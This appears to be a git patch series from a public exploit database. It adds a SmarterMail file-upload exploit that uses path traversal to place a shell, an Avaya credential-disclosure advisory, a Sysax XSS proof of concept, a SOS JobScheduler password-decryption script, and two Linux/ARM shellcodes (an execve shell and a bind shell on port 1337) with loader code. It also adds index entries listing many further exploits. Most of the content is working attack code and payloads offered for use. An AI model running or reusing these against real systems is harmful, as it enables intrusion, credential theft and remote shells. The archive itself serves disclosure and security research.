#print(self.xz) + #print(self.xz.headers) + ''' + size = os.path.getsize(results.wbsf) + print(size) + replace_file = results.wbsf.replace(".","") + with open(results.wbsf, "rb") as outf: + contents = outf.read() + multipart_data = MultipartEncoder( + fields={ + "context": "file-storage", + #"contextData": '{"folder":"Root Folder\\ " + str(results.wbsd) + "\\"}', + "contextData": '{"folder":"Root Folder\\\\testos1\\\\"}', + "resumableChunkNumber": "1", + "resumableChunkSize": "2097152", + "resumableCurrentChunkSize": str(size), + "resumableTotalSize": str(size), + "resumableType": "image/jpeg", + #"resumableIdentifier": "955319-112097jpg", + "resumableIdentifier": str(size) + "-" + str(replace_file), + "resumableFilename": results.wbsf, + "resumableRelativePath": results.wbsf, + "resumableTotalChunks": "1", + "file": ( + 'blob',#112097.jpg', + #open(file, "rb"), + contents, + #file, + #"image/jpeg" + "application/octet-stream" + #'text/plain' + ) + + } +) + ''' + http_proxy = "http://127.0.0.1:8080" + proxyDict = { + "http" : http_proxy, + } + ''' + # if you want to activate intercept then add with that argument, this parameter is necessary requiresfunc(if you want to activate it, please remove it from the comment line.) >> proxies=proxyDict + self.dre = requests.post(url=results.wbsn + "/api/upload",headers={"Content-Type": multipart_data.content_type, + 'Authorization': "Bearer " + self.das, + 'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"},data=multipart_data) + + def shell_upload(self): + + ''' + http_proxy = "http://127.0.0.1:8080" + proxyDict = { + "http" : http_proxy, + } + ''' + + json_data = { + "folder": "Root Folder\\testos1\\", + "newFolderName": "\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\program files (x86)\\SmarterTools\\SmarterMail\\MRS\\testos1\\", + "parentFolder": "", + "newParentFolder": "Root Folder\\testos2" + } + #r = requests.post('http://mail.site.com/api/v1/filestorage/folder-patch', json=json_data, headers=self.headers, proxies=proxyDict) + r = requests.post(results.wbsn+'/api/v1/filestorage/folder-patch', json=json_data, headers=self.headers) + print(results.wbsn + "/testos1/" + results.wbsf) + +if __name__ == '__main__': + + parser = argparse.ArgumentParser() + parser.add_argument('-f', action='store', dest='wbsf', + help='Filename') + parser.add_argument('-w', action='store', dest='wbsn', + help='Target') + parser.add_argument('--version', action='version', version='SmartMail Knock Knock') + results = parser.parse_args() + + tako = Tak() + tako \ No newline at end of file diff --git a/exploits/multiple/webapps/48581.txt b/exploits/multiple/webapps/48581.txt new file mode 100644 index 000000000..c5ba5835c --- /dev/null +++ b/exploits/multiple/webapps/48581.txt @@ -0,0 +1,93 @@ +# Exploit Title: Avaya IP Office 11 - Password Disclosure +# Exploit Author: hyp3rlinx +# Date: 2020-06-09 +# Vender Homepage: https://downloads.avaya.com +# Product Link: https://downloads.avaya.com/css/P8/documents/101067493 +# CVE: CVE-2020-7030 + +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/AVAYA-IP-OFFICE-INSECURE-TRANSIT-PASSWORD-DISCLOSURE.txt +[+] twitter.com/hyp3rlinx +[+] ISR: ApparitionSec + + +[Vendor] +www.avaya.com + + +[Product] +Avaya IP Office v9.1.8.0 - 11 + +IP Office Platform provides a single, stackable, scalable small business communications system that grows with your business easily and cost-effectively. + + +[Vulnerability Type] +Insecure Transit Password Disclosure + + +[CVE Reference] +CVE-2020-7030 +ASA-2020-077 + + +[Security Issue] +A sensitive information disclosure vulnerability exists in the web interface component of IP Office that +may potentially allow a local user to gain unauthorized access to the component. + +The request URL on port 7071 and the web socket component requests on port 7070 used by Atmosphere-Framework +within Avaya IP Office, pass Base64 encoded credentials as part of the URL query string. + +https://:7071/serveredition/autologin?auth=QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y&referrer=https://x.x.x.x:7070&lang=en_US + +wss://:7070/WebManagement/webmanagement/atmosphere/QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y?X-Atmosphere-tracking-id=0& +X-Atmosphere-Framework=2.0.5-javascript&X-Atmosphere-Transport=websocket&X-Cache-Date=0&Content-Type=text/x-gwt-rpc;%20charset=UTF-8&X-atmo-protocol=true + +Base64 credentials: QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y +Value: Administrator:Administrator + +The Base64 encoded credentials can be easily disclosed if the machine used to logon to the web Manager is accessed by an attacker. +The URL plus the credentials can potentially be leaked or stored in some of the following locations. + +Browser History +Browser Cache +Browser Developer Tools +Cached by web proxy +Referer Header +Web Logs +Shared Systems + + +[Avaya Products affected] +Avaya IP Office 9.x, 10.0 through 10.1.0.7, 11.0 through 11.0.4.2 + + +[References] +https://downloads.avaya.com/css/P8/documents/101067493 + + +[Network Access] +Remote + + +[Severity] +Medium + + +[Disclosure Timeline] +Vendor Notification: February 19, 2020 +Vendor confirms issue: March 4, 2020 +Vendor release advisory fix : June 3, 2020 +June 4, 2020 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/multiple/webapps/48582.txt b/exploits/multiple/webapps/48582.txt new file mode 100644 index 000000000..d52249d0a --- /dev/null +++ b/exploits/multiple/webapps/48582.txt @@ -0,0 +1,17 @@ + # Exploit Title: Sysax MultiServer 6.90 - Reflected Cross Site Scripting +# Google Dork: n.d. +# Date: 2020-06-02 +# Exploit Author: Luca Epifanio (wrongsid3) +# Vendor Homepage: https://www.sysax.com/ +# Software Link: https://www.sysax.com/download.htm +# Version: MultiServer 6.90 +# Tested on: Windows 10 x64 +# CVE : CVE-2020-13228 + +There is reflected XSS via the /scgi sid parameter. + +PoC: +http://192.168.88.131/scgi?sid=684216c78659562c92775c885e956585cdb180fd +&pid=transferpage2_name1_fff.htm + +PoC Screen: https://pasteboard.co/J9eE2GQ.png \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1364a99ad..9156dcf38 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42802,5 +42802,8 @@ id,file,description,date,author,type,platform,port 48567,exploits/php/webapps/48567.txt,"Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection",2020-06-09,"Kostadin Tonev",webapps,php, 48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php, 48571,exploits/php/webapps/48571.txt,"Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)",2020-06-10,Extinction,webapps,php, -48572,exploits/php/webapps/48572.txt,"Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php, +48572,exploits/php/webapps/48572.txt,"Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php, 48574,exploits/php/webapps/48574.txt,"Virtual Airlines Manager 2.6.2 - 'id' SQL Injection",2020-06-10,Mosaaed,webapps,php, +48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple, +48581,exploits/multiple/webapps/48581.txt,"Avaya IP Office 11 - Password Disclosure",2020-06-12,hyp3rlinx,webapps,multiple, +48582,exploits/multiple/webapps/48582.txt,"Sysax MultiServer 6.90 - Reflected Cross Site Scripting",2020-06-12,"Luca Epifanio",webapps,multiple, From bb9f12afc7930e17af47218aa0123120f70367a3 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 16 Jun 2020 05:01:56 +0000 Subject: [PATCH 14/17] DB: 2020-06-16 3 changes to exploits/shellcodes SOS JobScheduler 1.13.3 - Stored Password Decryption Linux/ARM - execve /bin/dash Shellcode (32 bytes) Linux/ARM - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes) --- exploits/multiple/remote/48587.py | 37 ++++++++++++++ files_exploits.csv | 1 + files_shellcodes.csv | 2 + shellcodes/arm/48585.c | 81 ++++++++++++++++++++++++++++++ shellcodes/arm/48586.c | 83 +++++++++++++++++++++++++++++++ 5 files changed, 204 insertions(+) create mode 100755 exploits/multiple/remote/48587.py create mode 100644 shellcodes/arm/48585.c create mode 100644 shellcodes/arm/48586.c diff --git a/exploits/multiple/remote/48587.py b/exploits/multiple/remote/48587.py new file mode 100755 index 000000000..993bfbdc3 --- /dev/null +++ b/exploits/multiple/remote/48587.py @@ -0,0 +1,37 @@ +# Exploit Title: SOS JobScheduler 1.13.3 - Stored Password Decryption +# Google Dork: N/A +# Date: 2020-04-20 +# Exploit Author: Sander Ubink +# Vendor Homepage: www.sos-berlin.com +# Software Link: www.sos-berlin.com/en/jobscheduler-downloads +# Version: Tested on 1.12.9 and 1.13.3, vendor reported 1.12 and 1.13 +# Tested on: Windows and Linux +# CVE: CVE-2020-12712 + +# Description: SOS JobScheduler is a tool for remote system administration that allows users to call maintenance scripts via a web interface. +# The tool places the maintenance scripts on the remote systems by means of (S)FTP. It allows the user to save profiles for these connections, +# in which the password for the (S)FTP connection is optionally stored. When the user chooses to store the password with the profile, +# it is encrypted using the name of the profile as the encryption key. Since the name of the profile is stored in the same configuration file, +# the plaintext (S)FTP password can trivially be recovered. The encryption algorithm used is Triple DES (3DES) with three keys, requiring a key +# length of 24 bytes. The profile name is padded to this length to create the key. Finally, the encrypted password gets base64 encoded before +# being stored in the configuration file. + +# Usage: python jobscheduler-decrypt.py [encrypted password in base64] [profile name] + +import pyDes +import base64 +import argparse + +parser = argparse.ArgumentParser(description="Decrypt the password stored in a Jobscheduler (S)FTP profile configuration file") +parser.add_argument("password", help="password to be decrypted") +parser.add_argument("profilename", help="name of the profile") +args = parser.parse_args() + +if len(args.profilename) > 24: + sys.exit("Profile name is longer than 24 characters. Check the validity of the input.") + +key = args.profilename + ((24 - len(args.profilename)) * " ") +cipher = pyDes.triple_des(key, pyDes.ECB, b"\0\0\0\0\0\0\0\0", pad=" ", padmode=None) +plain = cipher.decrypt(base64.b64decode(args.password)) + +print(plain) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 9156dcf38..486af450a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18175,6 +18175,7 @@ id,file,description,date,author,type,platform,port 48537,exploits/windows/remote/48537.py,"Microsoft Windows - 'SMBGhost' Remote Code Execution",2020-06-02,chompie1337,remote,windows, 48540,exploits/linux/remote/48540.py,"vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-02,aaronsvk,remote,linux, 48569,exploits/multiple/remote/48569.py,"HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)",2020-06-10,hyp3rlinx,remote,multiple, +48587,exploits/multiple/remote/48587.py,"SOS JobScheduler 1.13.3 - Stored Password Decryption",2020-06-15,"Sander Ubink",remote,multiple, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index fbc6a8d1c..4df2da0ca 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1021,3 +1021,5 @@ id,file,description,date,author,type,platform 48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64 48355,shellcodes/windows/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows 48379,shellcodes/linux/48379.c,"Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux +48585,shellcodes/arm/48585.c,"Linux/ARM - execve /bin/dash Shellcode (32 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm +48586,shellcodes/arm/48586.c,"Linux/ARM - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm diff --git a/shellcodes/arm/48585.c b/shellcodes/arm/48585.c new file mode 100644 index 000000000..86fde7c15 --- /dev/null +++ b/shellcodes/arm/48585.c @@ -0,0 +1,81 @@ +# Title: Linux/ARM - execve /bin/dash Shellcode (32 bytes) +# Date: 2020-06-08 +# Category: Shellcode +# Tested: armv7l (32-bit)(Raspberry Pi 2 Model B) (OS: Raspbian Buster Lite) +# Author: Anurag Srivastava +# Description: execve shellcode + +/* +## Objdump + +pi@raspberrypi:~/hex $ objdump -d ed1 + +ed1: file format elf32-littlearm + + +Disassembly of section .text: + +00010054 <_start>: + 10054: e28f3001 add r3, pc, #1 + 10058: e12fff13 bx r3 + 1005c: a002 add r0, pc, #8 ; (adr r0, 10068 <_start+0x14>) + 1005e: 1a49 subs r1, r1, r1 + 10060: 1c0a adds r2, r1, #0 + 10062: 7242 strb r2, [r0, #9] + 10064: 270b movs r7, #11 + 10066: df01 svc 1 + 10068: 6e69622f .word 0x6e69622f + 1006c: 7361642f .word 0x7361642f + 10070: 46c05968 .word 0x46c05968 +pi@raspberrypi:~/hex $ nano ed1.s + +##code + +pi@raspberrypi:~/hex $ cat ed1.s +.section .text +.global _start + +_start: + .ARM + add r3, pc, #1 + bx r3 + + .THUMB + add r0, pc, #8 + sub r1, r1, r1 + mov r2, r1 + strb r2, [r0, #9] + mov r7, #11 + svc #1 + +.ascii "/bin/dashY" + +pi@raspberrypi:~/hex $ as ed1.s -o ex.o +pi@raspberrypi:~/hex $ ld -N ex.o -o exdash +pi@raspberrypi:~/hex $ objcopy -O binary exdash exdash.bin +pi@raspberrypi:~/hex $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' exdash.bin +\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x1a\x0a\x1c\x42\x72\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x64\x61\x73\x68\x59\xc0\x46 + + +## Steps to compile given shellcode C program file +pi@raspberrypi:~ gcc -fno-stack-protector -z execstack tada.c -o tada +pi@raspberrypi:~/hex $ ./tada +Shellcode Length: 32 +$ whoami +pi +$ exit + +*/ + + +#include +#include + +unsigned char shellcode[] = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x1a\x0a\x1c\x42\x72\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x64\x61\x73\x68\x59\xc0\x46"; +main(){ + + printf("Shellcode Length: %d\n", (int)strlen(shellcode)); + int (*ret)() = (int(*)())shellcode; + + ret(); +} \ No newline at end of file diff --git a/shellcodes/arm/48586.c b/shellcodes/arm/48586.c new file mode 100644 index 000000000..25dff5bb7 --- /dev/null +++ b/shellcodes/arm/48586.c @@ -0,0 +1,83 @@ +# Title: Linux/ARM (Raspberry Pi) - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes) +# Date: 2020-06-09 +# Architecture: armv6l GNU/Linux +# Website: http://www.theanuragsrivastava.com +# Author: Anurag Srivastava + + +/* + + +bindwala: file format elf32-littlearm + + +Disassembly of section .text: + +00010054 <_start>: + 10054: e28f3001 add r3, pc, #1 + 10058: e12fff13 bx r3 + 1005c: 2001 movs r0, #1 + 1005e: 1c01 adds r1, r0, #0 + 10060: 3001 adds r0, #1 + 10062: 4052 eors r2, r2 + 10064: 27c8 movs r7, #200 ; 0xc8 + 10066: 3751 adds r7, #81 ; 0x51 + 10068: df01 svc 1 + 1006a: 1c04 adds r4, r0, #0 + 1006c: 46c0 nop ; (mov r8, r8) + 1006e: a10e add r1, pc, #56 ; (adr r1, 100a8 ) + 10070: 704a strb r2, [r1, #1] + 10072: 604a str r2, [r1, #4] + 10074: 2210 movs r2, #16 + 10076: 3701 adds r7, #1 + 10078: df01 svc 1 + 1007a: 1c20 adds r0, r4, #0 + 1007c: 2102 movs r1, #2 + 1007e: 187f adds r7, r7, r1 + 10080: df01 svc 1 + 10082: 1c20 adds r0, r4, #0 + 10084: 4049 eors r1, r1 + 10086: 1c0a adds r2, r1, #0 + 10088: 3701 adds r7, #1 + 1008a: df01 svc 1 + 1008c: 1c04 adds r4, r0, #0 + 1008e: 2102 movs r1, #2 + +00010090 : + 10090: 1c20 adds r0, r4, #0 + 10092: 273f movs r7, #63 ; 0x3f + 10094: df01 svc 1 + 10096: 3901 subs r1, #1 + 10098: d5fa bpl.n 10090 + 1009a: a005 add r0, pc, #20 ; (adr r0, 100b0 ) + 1009c: 1a49 subs r1, r1, r1 + 1009e: 1c0a adds r2, r1, #0 + 100a0: 71c1 strb r1, [r0, #7] + 100a2: 270b movs r7, #11 + 100a4: df01 svc 1 + 100a6: 46c0 nop ; (mov r8, r8) + +000100a8 : + 100a8: 3905ff02 .word 0x3905ff02 + 100ac: 01010101 .word 0x01010101 + +000100b0 : + 100b0: 6e69622f .word 0x6e69622f + 100b4: 5868732f .word 0x5868732f +pi@raspberrypi:~/hex $ nano tada.c +pi@raspberrypi:~/hex $ gcc -fno-stack-protector -z execstack tada.c -o tada +pi@raspberrypi:~/hex $ ./tada +Shellcode Length: 100 + +*/ +#include +#include + +unsigned char shellcode[] = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x01\x20\x01\x1c\x01\x30\x52\x40\xc8\x27\x51\x37\x01\xdf\x04\x1c\xc0\x46\x0e\xa1\x4a\x70\x4a\x60\x10\x22\x01\x37\x01\xdf\x20\x1c\x02\x21\x7f\x18\x01\xdf\x20\x1c\x49\x40\x0a\x1c\x01\x37\x01\xdf\x04\x1c\x02\x21\x20\x1c\x3f\x27\x01\xdf\x01\x39\xfa\xd5\x05\xa0\x49\x1a\x0a\x1c\xc1\x71\x0b\x27\x01\xdf\xc0\x46\x02\xff\x05\x39\x01\x01\x01\x01\x2f\x62\x69\x6e\x2f\x73\x68\x58"; +main(){ + + printf("Shellcode Length: %d\n", (int)strlen(shellcode)); + int (*ret)() = (int(*)())shellcode; + + ret(); +} \ No newline at end of file From 8fc6092de14ce4c4cc89f22c613bf39dc0561e36 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 17 Jun 2020 05:02:00 +0000 Subject: [PATCH 15/17] DB: 2020-06-17 4 changes to exploits/shellcodes NETGEAR SSL312 Router - Denial of Service Netgear SSL312 Router - Denial of Service NETGEAR WGR614v9 Wireless Router - Denial of Service Netgear WGR614v9 Wireless Router - Denial of Service NETGEAR DG632 Router - Remote Denial of Service Netgear DG632 Router - Remote Denial of Service NETGEAR ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service Netgear ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service NETGEAR ProSafe - Denial of Service Netgear ProSafe - Denial of Service NETGEAR WGR614 - Administration Interface Remote Denial of Service Netgear WGR614 - Administration Interface Remote Denial of Service NETGEAR Genie 2.4.32 - Unquoted Service Path Privilege Escalation Netgear Genie 2.4.32 - Unquoted Service Path Privilege Escalation Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path NETGEAR WG102 - Leaks SNMP Write Password With Read Access Netgear WG102 - Leaks SNMP Write Password With Read Access NETGEAR DG632 Router - Authentication Bypass Netgear DG632 Router - Authentication Bypass NETGEAR WNR2000 FW 1.2.0.8 - Information Disclosure Netgear WNR2000 FW 1.2.0.8 - Information Disclosure NETGEAR WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit) Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit) NETGEAR FM114P Wireless Firewall - File Disclosure Netgear FM114P Wireless Firewall - File Disclosure NETGEAR FM114P ProSafe Wireless Router - UPnP Information Disclosure Netgear FM114P ProSafe Wireless Router - UPnP Information Disclosure NETGEAR FM114P ProSafe Wireless Router - Rule Bypass Netgear FM114P ProSafe Wireless Router - Rule Bypass NETGEAR RP114 3.26 - Content Filter Bypass Netgear RP114 3.26 - Content Filter Bypass NETGEAR DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit) Netgear DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit) NETGEAR DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit) Netgear DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit) NETGEAR MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Remote Buffer Overflow Netgear MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Remote Buffer Overflow NETGEAR WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow NETGEAR ReadyNAS - Perl Code Evaluation (Metasploit) Netgear ReadyNAS - Perl Code Evaluation (Metasploit) NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting Netgear SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting NETGEAR WNR2000 - Multiple Information Disclosure Vulnerabilities Netgear WNR2000 - Multiple Information Disclosure Vulnerabilities NETGEAR WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities Netgear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities NETGEAR D6300B - '/diag.cgi?IPAddr4' Remote Command Execution Netgear D6300B - '/diag.cgi?IPAddr4' Remote Command Execution NETGEAR NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit) Netgear NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit) NETGEAR JNR1010 ADSL Router - (Authenticated) Remote File Disclosure NETGEAR WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - (Authenticated) Remote File Disclosure Netgear JNR1010 ADSL Router - (Authenticated) Remote File Disclosure Netgear WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - (Authenticated) Remote File Disclosure NETGEAR WNR2000v5 - Remote Code Execution Netgear WNR2000v5 - Remote Code Execution NETGEAR R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit) Netgear R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit) NETGEAR WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit) Netgear WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit) NETGEAR DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit) Netgear DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit) NETGEAR - 'TelnetEnable' Magic Packet (Metasploit) Netgear - 'TelnetEnable' Magic Packet (Metasploit) WordPress MU < 1.3.2 - active_plugins option Code Execution WordPress MU < 1.3.2 - 'active_plugins' Code Execution NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery Netgear Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery NETGEAR SPH200D - Multiple Vulnerabilities Netgear SPH200D - Multiple Vulnerabilities NETGEAR DGN1000B - Multiple Vulnerabilities Netgear DGN1000B - Multiple Vulnerabilities NETGEAR DGN2200B - Multiple Vulnerabilities Netgear DGN2200B - Multiple Vulnerabilities NETGEAR WNR1000 - Authentication Bypass Netgear WNR1000 - Authentication Bypass NETGEAR WPN824v3 - Unauthorized Configuration Download Netgear WPN824v3 - Unauthorized Configuration Download NETGEAR DGN1000 / DGN2200 - Multiple Vulnerabilities Netgear DGN1000 / DGN2200 - Multiple Vulnerabilities NETGEAR ProSafe - Information Disclosure Netgear ProSafe - Information Disclosure NETGEAR WNR1000v3 - Password Recovery Credential Disclosure (Metasploit) Netgear WNR1000v3 - Password Recovery Credential Disclosure (Metasploit) NETGEAR DGN2200 N300 Wireless Router - Multiple Vulnerabilities Netgear DGN2200 N300 Wireless Router - Multiple Vulnerabilities NETGEAR WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities Netgear WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting Netgear DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure NETGEAR WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access Netgear WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure Netgear ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation Netgear Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation NETGEAR Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities NETGEAR WNR1000v4 - Authentication Bypass Netgear WNR1000v4 - Authentication Bypass NETGEAR NMS300 ProSafe Network Management System - Multiple Vulnerabilities Netgear NMS300 ProSafe Network Management System - Multiple Vulnerabilities NETGEAR R7000 - Command Injection NETGEAR R7000 - Cross-Site Scripting Netgear R7000 - Command Injection Netgear R7000 - Cross-Site Scripting NETGEAR Routers - Password Disclosure Netgear Routers - Password Disclosure NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution Netgear DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution Netgear DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery Netgear DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery Multiple WordPress Plugins - Arbitrary File Upload Multiple WordPress Plugins - Arbitrary File Upload NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution Netgear ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution NETGEAR WiFi Router R6120 - Credential Disclosure Netgear WiFi Router R6120 - Credential Disclosure NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass Netgear WiFi Router JWNR2010v5 / R6080 - Authentication Bypass WordPress Plugin LearnDash LMS 3.1.2 - Reflective Cross-Site Scripting WordPress Plugin LearnDash LMS 3.1.2 - Reflective Cross-Site Scripting School File Management System 1.0 - 'username' SQL Injection School File Management System 1.0 - 'username' SQL Injection ChopSlider3 Wordpress Plugin3.4 - 'id' SQL Injection WordPress Plugin ChopSlider 3.4 - 'id' SQL Injection Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection WordPress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated) WordPress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated) Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation WordPress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Netgear R7000 Router - Remote Code Execution Gila CMS 1.11.8 - 'query' SQL Injection --- exploits/hardware/webapps/48588.py | 3670 +++++++++++++++++++++++++++ exploits/multiple/webapps/48582.txt | 2 +- exploits/php/webapps/48590.py | 47 + exploits/windows/local/48591.txt | 20 + files_exploits.csv | 143 +- 5 files changed, 3811 insertions(+), 71 deletions(-) create mode 100755 exploits/hardware/webapps/48588.py create mode 100755 exploits/php/webapps/48590.py create mode 100644 exploits/windows/local/48591.txt diff --git a/exploits/hardware/webapps/48588.py b/exploits/hardware/webapps/48588.py new file mode 100755 index 000000000..881822ade --- /dev/null +++ b/exploits/hardware/webapps/48588.py @@ -0,0 +1,3670 @@ +# EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48588.zip +# +# Exploits a pre-authentication memcpy based stack buffer overflow vulnerability +# in httpd on several devices and versions: +# +# Device Version httpd md5sum Exploit status +# AC1450 V1.0.0.36_10.0.17 c105a629d55d3f7b29d6b88e2cc6ff3a Untested +# AC1450 V1.0.0.34_10.0.16 b01fa2155dbe3d37c0d244f2a258b797 Untested +# AC1450 V1.0.0.22_1.0.10 8327b4ccf3c3ea1281f5beb932f308bb Untested +# AC1450 V1.0.0.14_1.0.6 a199bd85a19fbfe360e967c889fb0a83 Untested +# AC1450 V1.0.0.8_1.0.4 c1f64b91722efa50452d6842a5e97f77 Untested +# AC1450 V1.0.0.6_1.0.3 1b043477b16d5bbd2be3d4b7c4430953 Untested +# D6220 V1.0.0.52_1.0.52 4c63e0a531ddf60310faf99702226c37 Untested +# D6220 V1.0.0.48_1.0.48 2efa4dfdb0901ffe4b99555e2ddeca32 Untested +# D6220 V1.0.0.46_1.0.46 2911f178060efcda3644be4bc7f25249 Untested +# D6220 V1.0.0.44_1.0.44 3ea0dbb8e22d0e4daf3f12d5bb26ab64 Untested +# D6220 V1.0.0.40_1.0.40 ef47f7085976c65890991eb67bbd31f7 Untested +# D6220 V1.0.0.36_1.0.36 